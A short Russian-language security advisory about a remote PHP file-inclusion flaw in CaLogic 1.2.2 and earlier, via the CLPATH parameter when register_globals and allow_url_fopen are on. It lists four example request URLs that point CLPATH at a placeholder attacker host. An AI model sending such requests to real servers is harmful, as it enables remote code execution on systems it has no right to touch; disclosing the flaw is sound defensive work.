Программа: CaLogic 1.2.2 и более ранние версии

Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость
существует из-за недостаточной обработки
входных данных в параметре CLPATH при
включенных опциях register_globals и allow_url_fopen в
конфигурационном файле PHP. Злоумышленник
может с помощью специально сформированного
URL выполнить произвольный PHP сценарий на
целевой системе.

Примеры:

http://[vitim]/calogic/cl_minical.php? CLPATH=http://attacker
http://[vitim]calogic/clmcpreload.php? CLPATH=http://attacker
http://[vitim]/calogic/mcconfig.php? CLPATH=http://attacker
http://[vitim]/calogic/mcpi-demo.php? CLPATH=http://attacker

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии